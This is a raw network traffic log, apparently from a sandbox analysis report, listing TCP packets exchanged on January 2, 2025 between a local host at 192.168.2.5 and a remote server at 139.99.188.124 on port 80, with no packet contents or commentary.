                                                          Jan 2, 2025 10:55:01.096812010 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096818924 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096832991 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096854925 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105629921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105662107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105673075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105716944 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105722904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105734110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105765104 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105777025 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105808973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105822086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105860949 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105890036 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105901003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105911016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105931997 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105984926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105995893 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106007099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106025934 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106056929 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106131077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106147051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106158018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106168985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106179953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106187105 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106190920 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106213093 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106241941 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106408119 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106420040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106430054 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106440067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106451988 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106455088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106477976 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.108280897 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216569901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216605902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216615915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216633081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216644049 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216651917 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216655016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216685057 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216727972 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216733932 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216737986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216747999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216768980 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216814995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216859102 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216891050 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216901064 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216909885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216958046 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217025042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217036009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217045069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217053890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217063904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217072010 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217086077 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217180014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217206001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217236996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217247963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217256069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217263937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217278004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217288017 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217377901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217389107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217397928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217406988 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217412949 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217416048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217426062 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217428923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217462063 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217617035 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217627048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217662096 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217741966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217752934 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217761993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217789888 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217798948 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217820883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217832088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217840910 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217881918 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218063116 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218072891 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218081951 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218091965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218101025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218102932 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218110085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218120098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218132973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218142986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218143940 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218156099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218164921 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218189001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218415976 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218426943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218470097 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218483925 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218494892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218503952 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218513012 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218522072 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218597889 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218689919 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218698978 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218708038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218718052 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218725920 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218734980 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218744040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218766928 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218792915 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218939066 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218997955 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219091892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219105005 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219114065 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219122887 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219131947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219136000 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219141960 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219151020 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219157934 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219161034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219168901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219178915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219187021 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219203949 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219223022 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219449997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219460011 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219469070 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219500065 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219594002 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219604015 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219611883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219620943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219630003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219636917 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219641924 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219650030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219660997 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219670057 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219671011 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219680071 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.219686031 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.219711065 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227076054 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227114916 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227119923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227200985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227241039 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227242947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227256060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227302074 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227333069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227343082 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227375031 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227441072 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227454901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227463961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227473974 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227490902 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227514982 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227600098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227611065 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227618933 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227627993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227648973 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227660894 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227739096 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227750063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227790117 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227792978 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227802992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227811098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227819920 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.227840900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.227869034 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.228055000 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228065968 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228075027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228079081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228086948 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228096008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228120089 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.228144884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.228260994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228276014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228285074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228293896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228305101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.228312016 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.228336096 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.269668102 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303549051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303566933 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303577900 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303596020 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303606987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303617954 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303618908 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303646088 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303652048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303661108 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303688049 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303726912 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303807974 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303818941 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303828955 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303853035 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.303896904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303922892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.303940058 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304009914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304022074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304033041 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304050922 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304080009 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304198027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304208994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304219961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304230928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304236889 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304246902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304258108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304265022 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304269075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304303885 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304455042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304466963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304476976 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304496050 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304512978 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304546118 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304557085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304568052 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304586887 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304725885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304737091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304747105 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304758072 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304769039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304769039 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304779053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304790974 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304794073 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304811001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304831982 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.304966927 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304979086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.304989100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305007935 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305197954 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305208921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305218935 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305229902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305238962 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305239916 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305250883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305260897 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305262089 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305285931 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305304050 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305471897 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305483103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305494070 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305505037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305515051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305517912 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305526018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305536985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305536985 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305552959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305563927 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305567026 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305574894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305586100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305587053 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305610895 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305903912 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305916071 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305927038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305938005 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305946112 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.305948973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305958986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.305975914 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306001902 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306170940 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306184053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306194067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306205034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306214094 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306215048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306226015 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306226015 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306236982 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306253910 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306282043 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306308031 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306320906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306329012 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306339979 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306349993 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306349993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306361914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306372881 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306381941 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306382895 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306394100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306404114 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306416035 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306418896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306447029 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306842089 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306854010 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.306886911 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.306886911 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315287113 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315346003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.315372944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315382957 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.315414906 CET4970580192.168.2.5139.99.188.124
